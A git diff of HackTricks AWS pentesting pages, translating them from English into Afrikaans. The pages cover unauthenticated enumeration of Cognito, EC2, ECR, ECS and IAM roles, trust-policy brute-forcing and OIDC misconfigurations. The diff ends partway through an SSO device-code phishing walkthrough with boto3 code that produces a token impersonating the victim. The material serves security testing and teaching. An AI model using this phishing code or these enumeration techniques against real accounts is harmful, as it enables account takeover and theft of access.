 #### Usage
 
-Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
-
+Voorbeeld `cognito__attack` gebruik om te probeer om gebruikers te skep en alle privesc-vectors teen 'n gegewe identiteitspoel en gebruikerspoelklient:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliënte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
index 004a92c2b..e79484982 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 <name>.cluster-<random>.<region>.docdb.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
index e9e7fa8e4..0b93df617 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
@@ -1,19 +1,15 @@
-# AWS - DynamoDB Unauthenticated Access
+# AWS - DynamoDB Ongeauthentiseerde Toegang
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Dynamo DB
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
 {{#endref}}
 
-Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB.
+Behalwe om toegang te gee tot alle AWS of sommige gecompromitteerde eksterne AWS-rekeninge, of om 'n paar SQL-inspuitings in 'n toepassing wat met DynamoDB kommunikeer te hê, weet ek nie van meer opsies om toegang tot AWS-rekeninge vanaf DynamoDB te verkry nie.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
index 657bf7f3a..681acd5d2 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
@@ -4,7 +4,7 @@
 
 ## EC2 & Related Services
 
-Check in this page more information about this:
+Kyk op hierdie bladsy vir meer inligting oor dit:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,7 +12,7 @@ Check in this page more information about this:
 
 ### Public Ports
 
-It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it.
+Dit is moontlik om die **enige poort van die virtuele masjiene aan die internet bloot te stel**. Afhangende van **wat loop** in die blootgestelde poort, kan 'n aanvaller dit misbruik.
 
 #### SSRF
 
@@ -22,8 +22,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
 
 ### Public AMIs & EBS Snapshots
 
-AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account:
-
+AWS laat toe om **toegang aan enigiemand te gee om AMIs en Snapshots af te laai**. Jy kan hierdie hulpbronne baie maklik vanaf jou eie rekening lys:
 ```bash
 # Public AMIs
 aws ec2 describe-images --executable-users all
@@ -38,11 +37,9 @@ aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLo
 aws ec2 describe-snapshots --restorable-by-user-ids all
 aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'
 ```
+As jy 'n snapshot vind wat deur enigiemand herstel kan word, maak seker om [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) na te gaan vir riglyne oor die aflaai en plundering van die snapshot.
 
-If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot.
-
-#### Public URL template
-
+#### Publieke URL-sjabloon
 ```bash
 # EC2
 ec2-{ip-seperated}.compute-1.amazonaws.com
@@ -50,15 +47,8 @@ ec2-{ip-seperated}.compute-1.amazonaws.com
 http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
 https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
 ```
-
-### Enumerate EC2 instances with public IP
-
+### Lys EC2-instansies met openbare IP
 ```bash
 aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
index 2febbed62..eefa936ca 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
@@ -4,35 +4,27 @@
 
 ## ECR
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Public registry repositories (images)
-
-As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws/<random>/<name>`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image.
+### Publieke registrasie repositories (beelde)
 
+Soos genoem in die ECS Enum afdeling, is 'n publieke registrasie **toeganklik vir enigiemand** en gebruik die formaat **`public.ecr.aws/<random>/<name>`**. As 'n publieke repository URL deur 'n aanvaller gevind word, kan hy **die beeld aflaai en soek na sensitiewe inligting** in die metadata en inhoud van die beeld.
 ```bash
 aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text
 ```
-
 > [!WARNING]
-> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo.
+> Dit kan ook gebeur in **privaat registries** waar 'n registry-beleid of 'n repository-beleid **toegang verleen byvoorbeeld aan `"AWS": "*"`**. Enigeen met 'n AWS-rekening kan toegang tot daardie repo verkry.
 
-### Enumerate Private Repo
-
-The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry.
+### Enumereer Privaat Repo
 
+Die gereedskap [**skopeo**](https://github.com/containers/skopeo) en [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) kan gebruik word om toeganklike repositories binne 'n privaat registry te lys.
 ```bash
 # Get image names
 skopeo list-tags docker://<PRIVATE_REGISTRY_URL> | grep -oP '(?<=^Name: ).+'
 crane ls <PRIVATE_REGISTRY_URL> | sed 's/ .*//'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
index 8d0b02ba2..b482812c6 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
@@ -4,16 +4,15 @@
 
 ## ECS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
 {{#endref}}
 
-### Publicly Accessible Security Group or Load Balancer for ECS Services
-
-A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks.
+### Publiek Toeganklike Sekuriteitsgroep of Laaibalanser vir ECS Dienste
 
+'n Foutief geconfigureerde sekuriteitsgroep wat **inkomende verkeer van die internet (0.0.0.0/0 of ::/0)** na die Amazon ECS dienste toelaat, kan die AWS hulpbronne aan aanvalle blootstel.
 ```bash
 # Example of detecting misconfigured security group for ECS services
 aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]'
@@ -21,9 +20,4 @@ aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contain
 # Example of detecting a publicly accessible load balancer for ECS services
 aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
index 3a73a7328..181799793 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
@@ -1,41 +1,35 @@
-# AWS - Elastic Beanstalk Unauthenticated Enum
+# AWS - Elastic Beanstalk Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Elastic Beanstalk
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
-### Web vulnerability
+### Web kwesbaarheid
 
-Note that by default Beanstalk environments have the **Metadatav1 disabled**.
+Let daarop dat Beanstalk omgewings standaard die **Metadatav1 gedeaktiveer** het.
 
-The format of the Beanstalk web pages is **`https://<webapp-name>-env.<region>.elasticbeanstalk.com/`**
+Die formaat van die Beanstalk webbladsye is **`https://<webapp-name>-env.<region>.elasticbeanstalk.com/`**
 
-### Insecure Security Group Rules
+### Onveilige Sekuriteitsgroep Reëls
 
-Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**.
+Sleg geconfigureerde sekuriteitsgroep reëls kan Elastic Beanstalk instansies aan die publiek blootstel. **Oormatig toelaatbare inkomende reëls, soos om verkeer van enige IP adres (0.0.0.0/0) op sensitiewe poorte toe te laat, kan aanvallers in staat stel om toegang tot die instansie te verkry**.
 
-### Publicly Accessible Load Balancer
+### Publiek Toeganklike Laaibalanser
 
-If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments.
+As 'n Elastic Beanstalk omgewing 'n laaibalanser gebruik en die laaibalanser geconfigureer is om publiek toeganklik te wees, kan aanvallers **versoeke direk na die laaibalanser stuur**. Alhoewel dit dalk nie 'n probleem vir webtoepassings is wat bedoel is om publiek toeganklik te wees nie, kan dit 'n probleem wees vir private toepassings of omgewings.
 
-### Publicly Accessible S3 Buckets
+### Publiek Toeganklike S3 Emmers
 
-Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**.
-
-### Enumerate Public Environments
+Elastic Beanstalk toepassings word dikwels in S3 emmers gestoor voor ontplooiing. As die S3 emmer wat die toepassing bevat publiek toeganklik is, kan 'n aanvaller **die toepassingskode aflaai en soek na kwesbaarhede of sensitiewe inligting**.
 
+### Enumereer Publieke Omgewings
 ```bash
 aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
index 6ed2b74fe..d267b90bf 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md
@@ -2,15 +2,9 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Publieke URL-sjabloon
 ```
 https://vpc-{user_provided}-[random].[region].es.amazonaws.com
 https://search-{user_provided}-[random].[region].es.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
index b6092fda4..cbf3fd01e 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
@@ -1,180 +1,162 @@
-# AWS - IAM & STS Unauthenticated Enum
+# AWS - IAM & STS Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Enumerate Roles & Usernames in an account
+## Enumereer Rolle & Gebruikersname in 'n rekening
 
-### ~~Assume Role Brute-Force~~
+### ~~Neem Rol Brute-Force~~
 
 > [!CAUTION]
-> **This technique doesn't work** anymore as if the role exists or not you always get this error:
+> **Hierdie tegniek werk nie** meer nie, aangesien jy altyd hierdie fout kry, ongeag of die rol bestaan of nie:
 >
 > `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas`
 >
-> You can **test this running**:
+> Jy kan **dit toets deur**:
 >
 > `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example`
 
-Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return:
-
+Die poging om **'n rol aan te neem sonder die nodige toestemmings** aktiveer 'n AWS-foutboodskap. Byvoorbeeld, as jy nie gemagtig is nie, kan AWS teruggee:
 ```ruby
 An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
 ```
-
-This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**:
-
+Hierdie boodskap bevestig die rol se bestaan, maar dui aan dat sy aanneemrolbeleid nie jou aanneming toelaat nie. In teenstelling hiermee, probeer om **'n nie-bestaande rol aan te neem lei tot 'n ander fout**:
 ```less
 An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
 ```
+Interessant genoeg is hierdie metode van **onderskeiding tussen bestaande en nie-bestaande rolle** toepaslik selfs oor verskillende AWS-rekeninge. Met 'n geldige AWS-rekening ID en 'n geteikende woordlys, kan 'n mens die rolle in die rekening opnoem sonder om enige inherente beperkings te ondervind.
 
-Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations.
+Jy kan hierdie [script gebruik om potensiële principals op te noem](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) wat hierdie probleem misbruik.
 
-You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue.
+### Trust Policies: Brute-Force Cross Account rolle en gebruikers
 
-### Trust Policies: Brute-Force Cross Account roles and users
-
-Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided.
+Om 'n **IAM rol se trust beleid te konfigureer of op te dateer, behels dit die definisie van watter AWS hulpbronne of dienste toegelaat word om daardie rol aan te neem** en tydelike kredensiale te verkry. As die gespesifiseerde hulpbron in die beleid **bestaande** is, stoor die trust beleid **suksesvol**. As die hulpbron egter **nie bestaan nie**, word 'n **fout gegenereer**, wat aandui dat 'n ongeldige principal verskaf is.
 
 > [!WARNING]
-> Note that in that resource you could specify a cross account role or user:
+> Let daarop dat jy in daardie hulpbron 'n cross account rol of gebruiker kan spesifiseer:
 >
 > - `arn:aws:iam::acc_id:role/role_name`
 > - `arn:aws:iam::acc_id:user/user_name`
 
-This is a policy example:
-
+Dit is 'n beleidsvoorbeeld:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::216825089941:role/Test"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::216825089941:role/Test"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
-
 #### GUI
 
-That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating)
+Dit is die **fout** wat jy sal vind as jy 'n **rol wat nie bestaan nie** gebruik. As die rol **bestaan**, sal die beleid **gestoor** word sonder enige foute. (Die fout is vir opdatering, maar dit werk ook wanneer jy skep)
 
 ![](<../../../images/image (153).png>)
 
 #### CLI
-
 ```bash
 ### You could also use: aws iam update-assume-role-policy
 # When it works
 aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
 {
-    "Role": {
-        "Path": "/",
-        "RoleName": "Test-Role",
-        "RoleId": "AROA5ZDCUJS3DVEIYOB73",
-        "Arn": "arn:aws:iam::947247140022:role/Test-Role",
-        "CreateDate": "2022-05-03T20:50:04Z",
-        "AssumeRolePolicyDocument": {
-            "Version": "2012-10-17",
-            "Statement": [
-                {
-                    "Effect": "Allow",
-                    "Principal": {
-                        "AWS": "arn:aws:iam::316584767888:role/account-balance"
-                    },
-                    "Action": [
-                        "sts:AssumeRole"
-                    ]
-                }
-            ]
-        }
-    }
+"Role": {
+"Path": "/",
+"RoleName": "Test-Role",
+"RoleId": "AROA5ZDCUJS3DVEIYOB73",
+"Arn": "arn:aws:iam::947247140022:role/Test-Role",
+"CreateDate": "2022-05-03T20:50:04Z",
+"AssumeRolePolicyDocument": {
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::316584767888:role/account-balance"
+},
+"Action": [
+"sts:AssumeRole"
+]
+}
+]
+}
+}
 }
 
 # When it doesn't work
 aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
 An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
 ```
-
 You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools)
 
 - `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt`
 
-Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu):
+Ons gebruik [Pacu](https://github.com/RhinoSecurityLabs/pacu):
 
 - `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
 - `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt`
-- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration
+- Die `admin` rol wat in die voorbeeld gebruik word, is 'n **rol in jou rekening wat deur pacu geïmpersonifieer moet word** om die beleide te skep wat dit nodig het om vir die enumerasie te skep
 
 ### Privesc
 
-In the case the role was bad configured an allows anyone to assume it:
-
+In die geval dat die rol sleg gekonfigureer was en enige iemand toelaat om dit aan te neem:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "sts:AssumeRole"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "sts:AssumeRole"
+}
+]
 }
 ```
+Die aanvaller kan dit net aanvaar.
 
-The attacker could just assume it.
-
-## Third Party OIDC Federation
-
-Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\
-This trust might give access to a role with the following **trust policy**:
+## Derdeparty OIDC Federasie
 
+Stel jou voor dat jy daarin slaag om 'n **Github Actions workflow** te lees wat toegang het tot 'n **rol** binne **AWS**.\
+Hierdie vertroue mag toegang gee tot 'n rol met die volgende **vertrouensbeleid**:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam::<acc_id>:oidc-provider/token.actions.githubusercontent.com"
-      },
-      "Action": "sts:AssumeRoleWithWebIdentity",
-      "Condition": {
-        "StringEquals": {
-          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::<acc_id>:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
 }
 ```
+Hierdie vertrouensbeleid mag korrek wees, maar die **gebrek aan meer voorwaardes** behoort jou te laat wantrou.\
+Dit is omdat die vorige rol deur **ENIGEEN van Github Actions** aanvaar kan word! Jy moet ook ander dinge soos org naam, repo naam, omgewing, tak in die voorwaardes spesifiseer...
 
-This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\
-This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach...
-
-Another potential misconfiguration is to **add a condition** like the following:
-
+'n Ander potensiële miskonfigurasie is om **'n voorwaarde** soos die volgende by te voeg:
 ```json
 "StringLike": {
-    "token.actions.githubusercontent.com:sub": "repo:org_name*:*"
+"token.actions.githubusercontent.com:sub": "repo:org_name*:*"
 }
 ```
+Let op dat **wildcard** (\*) voor die **kolon** (:). Jy kan 'n org soos **org_name1** skep en **die rol aanvaar** vanaf 'n Github Action.
 
-Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action.
-
-## References
+## Verwysings
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
index fd4d31de6..6f9b9e7cb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
@@ -1,36 +1,33 @@
-# AWS - Identity Center & SSO Unauthenticated Enum
+# AWS - Identiteitsentrum & SSO Ongeauthentiseerde Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## AWS Device Code Phishing
+## AWS Toestelkode Phishing
 
-Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**.
+Aanvanklik voorgestel in [**hierdie blogpos**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), dit is moontlik om 'n **skakel** na 'n gebruiker te stuur wat AWS SSO gebruik, wat, indien die **gebruiker aanvaar**, die aanvaller in staat sal stel om 'n **token te verkry om die gebruiker na te boots** en toegang te verkry tot al die rolle wat die gebruiker kan benader in die **Identiteitsentrum**.
 
-In order to perform this attack the requisites are:
+Om hierdie aanval uit te voer, is die vereistes:
 
-- The victim needs to use **Identity Center**
-- The attacker must know the **subdomain** used by the victim `<victimsub>.awsapps.com/start`
+- Die slagoffer moet **Identiteitsentrum** gebruik
+- Die aanvaller moet die **subdomein** ken wat deur die slagoffer gebruik word `<victimsub>.awsapps.com/start`
 
-Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account.
+Net met die vorige inligting, sal die **aanvaller in staat wees om 'n skakel na die gebruiker te stuur** wat, indien **aangeneem**, die **aanvaller toegang tot die AWS gebruiker** rekening sal gee.
 
-### Attack
+### Aanval
 
-1. **Finding the subdomain**
+1. **Vind die subdomein**
 
-The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here.
-
-With this info, it's possible to get the region where the Indentity Center was configured with:
+Die eerste stap van die aanvaller is om uit te vind watter subdomein die slagoffer maatskappy in hul Identiteitsentrum gebruik. Dit kan gedoen word deur **OSINT** of **raai + BF** aangesien die meeste maatskappye hul naam of 'n variasie van hul naam hier sal gebruik.
 
+Met hierdie inligting is dit moontlik om die streek te kry waar die Identiteitsentrum geconfigureer is:
 ```bash
 curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
 "region":"us-east-1
 ```
+2. **Genereer die skakel vir die slagoffer & Stuur dit**
 
-2. **Generate the link for the victim & Send it**
-
-Run the following code to generate an AWS SSO login link so the victim can authenticate.\
-For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token:
-
+Voer die volgende kode uit om 'n AWS SSO aanmeldskakel te genereer sodat die slagoffer kan autentiseer.\
+Vir die demo, voer hierdie kode in 'n python-konsol uit en verlaat dit nie, aangesien jy later 'n paar voorwerpe nodig sal hê om die token te verkry:
 ```python
 import boto3
 
@@ -39,89 +36,84 @@ AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS
 
 sso_oidc = boto3.client('sso-oidc', region_name=REGION)
 client = sso_oidc.register_client(
-    clientName = 'attacker',
-    clientType = 'public'
+clientName = 'attacker',
+clientType = 'public'
 )
 
 client_id = client.get('clientId')
 client_secret = client.get('clientSecret')
 authz = sso_oidc.start_device_authorization(
-    clientId=client_id,
-    clientSecret=client_secret,
-    startUrl=AWS_SSO_START_URL
+clientId=client_id,
+clientSecret=client_secret,
+startUrl=AWS_SSO_START_URL
 )
 
 url = authz.get('verificationUriComplete')
 deviceCode = authz.get('deviceCode')
 print("Give this URL to the victim: " + url)
 ```
+Stuur die gegenereerde skakel na die slagoffer met jou wonderlike sosiale ingenieursvaardighede!
 
-Send the generated link to the victim using you awesome social engineering skills!
+3. **Wag totdat die slagoffer dit aanvaar**
 
-3. **Wait until the victim accepts it**
-
-If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\
-This is how the promp looks nowadays:
+As die slagoffer **reeds in AWS ingelog** was, sal hy net die toestemmings moet aanvaar, as hy nie was nie, sal hy moet **inlog en dan die toestemmings aanvaar**.\
+So lyk die prompt vandag:
 
 <figure><img src="../../../images/image (343).png" alt="" width="311"><figcaption></figcaption></figure>
 
-4. **Get SSO access token**
-
-If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**:
+4. **Kry SSO toegangstoken**
 
+As die slagoffer die prompt aanvaar het, voer hierdie kode uit om **'n SSO-token te genereer wat die gebruiker naboots**:
 ```python
 token_response = sso_oidc.create_token(
-    clientId=client_id,
-    clientSecret=client_secret,
-    grantType="urn:ietf:params:oauth:grant-type:device_code",
-    deviceCode=deviceCode
